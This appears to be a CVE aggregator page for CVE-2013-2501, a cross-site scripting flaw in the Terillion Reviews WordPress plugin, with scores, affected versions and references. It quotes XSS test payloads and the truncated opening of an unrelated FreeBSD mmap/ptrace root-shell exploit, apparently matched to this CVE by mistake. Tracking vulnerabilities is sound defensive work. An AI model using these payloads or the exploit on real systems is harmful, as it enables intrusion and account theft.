CVE-2013-2501
published 2013-03-22CVE-2013-2501: Cross-site scripting (XSS) vulnerability in the Terillion Reviews plugin before 1.2 for WordPress allows remote attackers to inject arbitrary web script or…
PriorityP426medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
5.27%
91.5th percentile
Cross-site scripting (XSS) vulnerability in the Terillion Reviews plugin before 1.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ProfileId field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| terillion | terillion_reviews_plugin | <= 1.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
exploitdb·2013-06-21
CVE-2013-2171 FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
FreeBSD 9.0
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8@1470n ;)
*
* Special thanks to proactivesec.com
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger \n");
if ((from_fd = open(av[0],
Exploit-DB
WordPress Plugin Terillion Reviews - Profile Id HTML Injection
exploitdb·2013-03-08
CVE-2013-2501 WordPress Plugin Terillion Reviews - Profile Id HTML Injection
WordPress Plugin Terillion Reviews - Profile Id HTML Injection
---
source: https://www.securityfocus.com/bid/58415/info
The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
">'>alert(String.fromCharCode(8
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2013-03/0055.htmlhttp://osvdb.org/91123http://packetstormsecurity.com/files/120730/WordPress-Terillion-Reviews-Cross-Site-Scripting.htmlhttp://plugins.trac.wordpress.org/changeset/683838/terillion-reviewshttp://wordpress.org/extend/plugins/terillion-reviews/changelog/http://www.securityfocus.com/bid/58415https://exchange.xforce.ibmcloud.com/vulnerabilities/82727http://archives.neohapsis.com/archives/bugtraq/2013-03/0055.htmlhttp://osvdb.org/91123http://packetstormsecurity.com/files/120730/WordPress-Terillion-Reviews-Cross-Site-Scripting.htmlhttp://plugins.trac.wordpress.org/changeset/683838/terillion-reviewshttp://wordpress.org/extend/plugins/terillion-reviews/changelog/http://www.securityfocus.com/bid/58415https://exchange.xforce.ibmcloud.com/vulnerabilities/82727
2013-03-22
Published